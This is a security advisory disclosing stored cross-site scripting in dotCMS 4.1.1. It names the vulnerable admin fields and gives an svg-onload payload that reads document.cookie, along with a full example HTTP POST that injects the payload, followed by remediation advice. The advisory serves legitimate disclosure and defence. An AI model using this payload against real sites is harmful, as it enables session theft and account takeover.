[+] CVE ID: Pending [+] Credits: Brett DeWall aka @xbadbiddyx [+] Websites: https://github.com/badbiddy [+] Source: https://raw.githubusercontent.com/badbiddy/Vulnerability-Disclosure/master/dotCMS%20%3E%204.1.1%20-%20Stored%20XSS Vendor: ========================== dotCMS https://www.dotcms.com/ Product: =========== dotCMS Version: 4.1.1 Vulnerability Type: ========================== Stored Cross-Site Scripting (XSS) Vulnerability Details: ===================== Application is vulnerable to stored XSS within multiple sections of the application. The application does not sanitize user supplied input and renders injected javascript code to the users browsers. Attackers use this vulnerability to inject malicious javascript code such as a malicious redirect, crypto currency mining, or exploit kit. Replication: ===================== 1) Navigate to the following example pages: - https://demo.dotcms.com/dotAdmin/#/c/vanity-urls -- Title parameter - https://demo.dotcms.com/dotAdmin/#/c/containers -- Description parameter - https://demo.dotcms.com/dotAdmin/#/c/templates -- Description parameter 2) Each of these areas of the application allow for unsanitized input to be supplied by a user. The following payload was utilized in the testing: or "%3Csvg%2Fonload%3Dalert%28document.cookie%29%3E" 3) Perform the normal function within the application to create a new "Vanity URL, Container, or Template" inserting the payload into the specific parameter location will trigger the vulnerability. Example HTTP Request with XSS payload: ===================== HTTP Request: POST /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=containers&p_p_action=1&p_p_state=maximized&p_p_mode=view&_containers_struts_action=%2Fext%2Fcontainers%2Fedit_container HTTP/1.1 Host: demo.dotcms.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0 _containers_cmd=add&_containers_referer=%252Fc%252Fportal%252Flayout%253Fp_l_id%253Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%2526p_p_id%253Dcontainers%2526p_p_action%253D1%2526p_p_state%253Dmaximized%2526_containers_pageNumber%253D1%2526_containers_struts_action%253D%25252Fext%25252Fcontainers%25252Fview_containers&_containers_redirect=https%3A%2F%2Fdemo.dotcms.com%2Fc%2Fportal%2Flayout%3Fp_l_id%3Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%26p_p_id%3Dcontainers%26p_p_action%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_containers_struts_action%3D%252Fext%252Fcontainers%252Fview_containers&_containers_subcmd=&_containers_inode=69956b08-e4d6-4f97-8101-55446da1e1cb&userId=dotcms.org.1&hostId=48190c8c-42c4-46af-8d1a-0cd5db894797&title=TEST&friendlyName=TEST%3Csvg%2Fonload%3Dalert%28document.cookie%29%3E&maxContentlets=0&preLoopMask=&preLoop=&toggleEditorPreLoop=on&structureInode=4c441ada-944a-43af-a653-9bb4f3f0cb2b&toggleEditorCodeMultiple=on&codeMask=TEST&code=TEST&toggleEditorCode=on&postLoopMask=&postLoop=&toggleEditorPostLoop=on¬es=&permissionsUserSelector= Remediation Details: ===================== Prevent the application from rendering javascript supplied from the end user. Create a whitelist of allowed characters for each input field. Sanitize user supplied input server side. Timeline: ===================== 2017-10-06 - Issue Reported to Vendor [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. badbiddy